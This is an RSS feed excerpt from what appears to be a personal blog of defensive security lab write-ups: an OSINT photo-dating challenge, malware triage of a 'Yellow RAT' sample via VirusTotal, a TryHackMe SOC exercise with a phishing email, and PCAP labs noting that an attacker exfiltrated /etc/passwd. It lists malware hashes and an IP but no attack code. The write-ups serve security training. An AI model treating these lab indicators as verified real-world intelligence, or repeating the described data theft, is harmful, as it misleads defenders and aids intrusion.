&lt;p&gt;&lt;img alt="footage for video" class="gallery-image" data-flex-basis="235px" data-flex-grow="98" height="740" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/osint-003-hackmyvm-challenge/7.png" width="727"&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt="on same article mentioned above" class="gallery-image" data-flex-basis="434px" data-flex-grow="180" height="576" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/osint-003-hackmyvm-challenge/8.png" srcset="https://quixtalia.in/p/osint-003-hackmyvm-challenge/8_hu_e40dd7651d055924.png 800w, https://quixtalia.in/p/osint-003-hackmyvm-challenge/8.png 1042w" width="1042"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;on site image name was &lt;code&gt;20170324-gata2.jpg&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;exiftool does not reveal anything&lt;/li&gt;
&lt;li&gt;which means 24 march 2017&lt;/li&gt;
&lt;li&gt;using shadow map we can estimate when this artist was painting mural&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="google bird eye view" class="gallery-image" data-flex-basis="348px" data-flex-grow="145" height="717" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/osint-003-hackmyvm-challenge/9.png" srcset="https://quixtalia.in/p/osint-003-hackmyvm-challenge/9_hu_b77fe1f6651565b6.png 800w, https://quixtalia.in/p/osint-003-hackmyvm-challenge/9.png 1041w" width="1041"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;red marks location of mural&lt;/li&gt;
&lt;li&gt;shade is in side of wall&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="shadow map" class="gallery-image" data-flex-basis="250px" data-flex-grow="104" height="738" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/osint-003-hackmyvm-challenge/10.png" width="770"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;so it should be around 4 pm - 6 pm in evening&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Yellow RAT Lab</title><link>https://quixtalia.in/p/yellow-rat-lab/</link><pubDate>Fri, 27 Feb 2026 23:46:21 +0000</pubDate><guid>https://quixtalia.in/p/yellow-rat-lab/</guid><description>&lt;h2 id="scenario"&gt;Scenario
&lt;/h2&gt;&lt;p&gt;&lt;img alt="Scenario" class="gallery-image" data-flex-basis="1786px" data-flex-grow="744" height="151" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/yellow-rat-lab/1.png" srcset="https://quixtalia.in/p/yellow-rat-lab/1_hu_839eeab57494c8a.png 800w, https://quixtalia.in/p/yellow-rat-lab/1.png 1124w" width="1124"&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id="questions"&gt;Questions
&lt;/h2&gt;&lt;p&gt;&lt;img alt="hash" class="gallery-image" data-flex-basis="629px" data-flex-grow="262" height="316" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/yellow-rat-lab/2.png" srcset="https://quixtalia.in/p/yellow-rat-lab/2_hu_85a1531cd88d618f.png 800w, https://quixtalia.in/p/yellow-rat-lab/2.png 829w" width="829"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;30E527E45F50D2BA82865C5679A6FA998EE0A1755361AB01673950810D071C85&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="virustotal results" class="gallery-image" data-flex-basis="391px" data-flex-grow="163" height="833" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/yellow-rat-lab/3.png" srcset="https://quixtalia.in/p/yellow-rat-lab/3_hu_ff883ac86548af29.png 800w, https://quixtalia.in/p/yellow-rat-lab/3.png 1359w" width="1359"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;name of the malware family that causes abnormal network traffic&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="community section" class="gallery-image" data-flex-basis="1685px" data-flex-grow="702" height="133" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/yellow-rat-lab/4.png" srcset="https://quixtalia.in/p/yellow-rat-lab/4_hu_3ee861edff532042.png 800w, https://quixtalia.in/p/yellow-rat-lab/4.png 934w" width="934"&gt;
&lt;a class="link" href="https://redcanary.com/blog/threat-intelligence/yellow-cockatoo/" target="_blank" rel="noopener"
 &gt;https://redcanary.com/blog/threat-intelligence/yellow-cockatoo/&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;i was expecting IOCs in article but nope&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="graph after login in to virustotal" class="gallery-image" data-flex-basis="477px" data-flex-grow="198" height="478" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/yellow-rat-lab/5.png" srcset="https://quixtalia.in/p/yellow-rat-lab/5_hu_196abdbf85d4be08.png 800w, https://quixtalia.in/p/yellow-rat-lab/5.png 951w" width="951"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;othewise in &lt;code&gt;relation&lt;/code&gt; tab&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="graph" class="gallery-image" data-flex-basis="528px" data-flex-grow="220" height="445" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/yellow-rat-lab/6.png" srcset="https://quixtalia.in/p/yellow-rat-lab/6_hu_fe405ab7e19b3725.png 800w, https://quixtalia.in/p/yellow-rat-lab/6.png 979w" width="979"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;click on that it will lead to same&lt;/li&gt;
&lt;li&gt;in &lt;code&gt;details&lt;/code&gt; tab&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="detail section" class="gallery-image" data-flex-basis="537px" data-flex-grow="224" height="369" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/yellow-rat-lab/7.png" srcset="https://quixtalia.in/p/yellow-rat-lab/7_hu_2a974a7d0b96d4e7.png 800w, https://quixtalia.in/p/yellow-rat-lab/7.png 827w" width="827"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;compilation timestamp of the malware&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="details section" class="gallery-image" data-flex-basis="505px" data-flex-grow="210" height="394" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/yellow-rat-lab/8.png" srcset="https://quixtalia.in/p/yellow-rat-lab/8_hu_7b6bb9263df56d0d.png 800w, https://quixtalia.in/p/yellow-rat-lab/8.png 830w" width="830"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;When was the malware first submitted to VirusTotal&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="details section" class="gallery-image" data-flex-basis="754px" data-flex-grow="314" height="232" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/yellow-rat-lab/9.png" width="729"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;name of the &lt;code&gt;.dat&lt;/code&gt; file that the malware dropped in the AppData folder&lt;/li&gt;
&lt;li&gt;read red canary article&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="red canary article" class="gallery-image" data-flex-basis="942px" data-flex-grow="392" height="297" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/yellow-rat-lab/10.png" srcset="https://quixtalia.in/p/yellow-rat-lab/10_hu_64ad66050235df8b.png 800w, https://quixtalia.in/p/yellow-rat-lab/10.png 1166w" width="1166"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;C2 server that the malware is communicating with?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="red canary article" class="gallery-image" data-flex-basis="533px" data-flex-grow="222" height="350" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/yellow-rat-lab/11.png" width="778"&gt;&lt;/p&gt;</description></item><item><title>First Shift CTF tryhackme</title><link>https://quixtalia.in/p/first-shift-ctf-tryhackme/</link><pubDate>Sun, 24 Aug 2025 00:00:00 +0000</pubDate><guid>https://quixtalia.in/p/first-shift-ctf-tryhackme/</guid><description>&lt;h2 id="probably-just-fine"&gt;Probably Just Fine
&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Unusual VPN login of &lt;a class="link" href="mailto:susan.martin@probablyfine.thm" &gt;susan.martin@probablyfine.thm&lt;/a&gt; from 37.19.201.132 (Singapore)&lt;/li&gt;
&lt;li&gt;Susan from Marketing is in Singapore, attending a security vendor conference&lt;/li&gt;
&lt;li&gt;TryDetectThis&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img class="gallery-image" data-flex-basis="643px" data-flex-grow="267" height="602" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/first-shift-ctf-tryhackme/image.png" srcset="https://quixtalia.in/p/first-shift-ctf-tryhackme/image_hu_2ce1371f018c450f.png 800w, https://quixtalia.in/p/first-shift-ctf-tryhackme/image_hu_8bc499fa23cbc774.png 1600w, https://quixtalia.in/p/first-shift-ctf-tryhackme/image.png 1613w" width="1613"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;she confirmed she did not log in to the company VPN&lt;/li&gt;
&lt;li&gt;using a public Wi-Fi hotspot at a cafe&lt;/li&gt;
&lt;li&gt;binary with the hash &lt;code&gt;b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;ul&gt;
&lt;li&gt;ASN number related to the IP?
&lt;img class="gallery-image" data-flex-basis="772px" data-flex-grow="321" height="234" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/first-shift-ctf-tryhackme/image-1.png" width="753"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="phishing-books"&gt;Phishing Books
&lt;/h2&gt;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;span class="lnt"&gt;2
&lt;/span&gt;&lt;span class="lnt"&gt;3
&lt;/span&gt;&lt;span class="lnt"&gt;4
&lt;/span&gt;&lt;span class="lnt"&gt;5
&lt;/span&gt;&lt;span class="lnt"&gt;6
&lt;/span&gt;&lt;span class="lnt"&gt;7
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;Subject: MFA Removal Requests
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;From: Dr. Isabella &amp;lt;isabella@kingford.ac.uk&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; Hey, ProbablyFine SOC Team,
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; I&amp;#39;ve been getting several emails asking me to approve my MFA.
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; Are you performing any tests? Should I approve these requests?
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; Dr. Isabella
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;</description></item><item><title>PCAP analysis lets defend lab</title><link>https://quixtalia.in/p/pcap-analysis-lets-defend-lab/</link><pubDate>Fri, 25 Aug 2023 00:00:00 +0000</pubDate><guid>https://quixtalia.in/p/pcap-analysis-lets-defend-lab/</guid><description>&lt;p&gt;&lt;img alt="Image 1" class="gallery-image" data-flex-basis="1249px" data-flex-grow="520" height="169" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/pcap-analysis-lets-defend-lab/1.png" srcset="https://quixtalia.in/p/pcap-analysis-lets-defend-lab/1_hu_d88d16c63c41c9a6.png 800w, https://quixtalia.in/p/pcap-analysis-lets-defend-lab/1.png 880w" width="880"&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt="Image 2" class="gallery-image" data-flex-basis="1614px" data-flex-grow="672" height="117" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/pcap-analysis-lets-defend-lab/2.png" width="787"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;follow tcp stream&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="Image 3" class="gallery-image" data-flex-basis="466px" data-flex-grow="194" height="746" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/pcap-analysis-lets-defend-lab/3.png" srcset="https://quixtalia.in/p/pcap-analysis-lets-defend-lab/3_hu_d6a12c0dd69ed175.png 800w, https://quixtalia.in/p/pcap-analysis-lets-defend-lab/3.png 1450w" width="1450"&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt="Image 4" class="gallery-image" data-flex-basis="371px" data-flex-grow="154" height="713" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/pcap-analysis-lets-defend-lab/4.png" srcset="https://quixtalia.in/p/pcap-analysis-lets-defend-lab/4_hu_95272f52d71efa1.png 800w, https://quixtalia.in/p/pcap-analysis-lets-defend-lab/4.png 1105w" width="1105"&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt="Image 5" class="gallery-image" data-flex-basis="659px" data-flex-grow="274" height="499" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/pcap-analysis-lets-defend-lab/5.png" srcset="https://quixtalia.in/p/pcap-analysis-lets-defend-lab/5_hu_8fa237f37af83da3.png 800w, https://quixtalia.in/p/pcap-analysis-lets-defend-lab/5.png 1372w" width="1372"&gt;&lt;/p&gt;
&lt;hr&gt;</description></item><item><title>WebStrike Lab</title><link>https://quixtalia.in/p/hello-world/</link><pubDate>Sun, 06 Mar 2022 00:00:00 +0000</pubDate><guid>https://quixtalia.in/p/hello-world/</guid><description>&lt;ul&gt;
&lt;li&gt;Your task is to analyze the provided PCAP file to uncover how the file appeared and determine the extent of any unauthorized activity.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img class="gallery-image" data-flex-basis="609px" data-flex-grow="254" height="277" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/hello-world/image.png" width="704"&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id="questions"&gt;Questions
&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;since we know this is about file&lt;/li&gt;
&lt;li&gt;check export object -&amp;gt; http&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="alt text" class="gallery-image" data-flex-basis="1516px" data-flex-grow="631" height="129" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/hello-world/image-1.png" srcset="https://quixtalia.in/p/hello-world/image-1_hu_3ee7025e110f9359.png 800w, https://quixtalia.in/p/hello-world/image-1.png 815w" width="815"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;attacker exfiltrated /etc/passwd file to his own ip&lt;/li&gt;
&lt;/ul&gt;</description></item></channel></rss>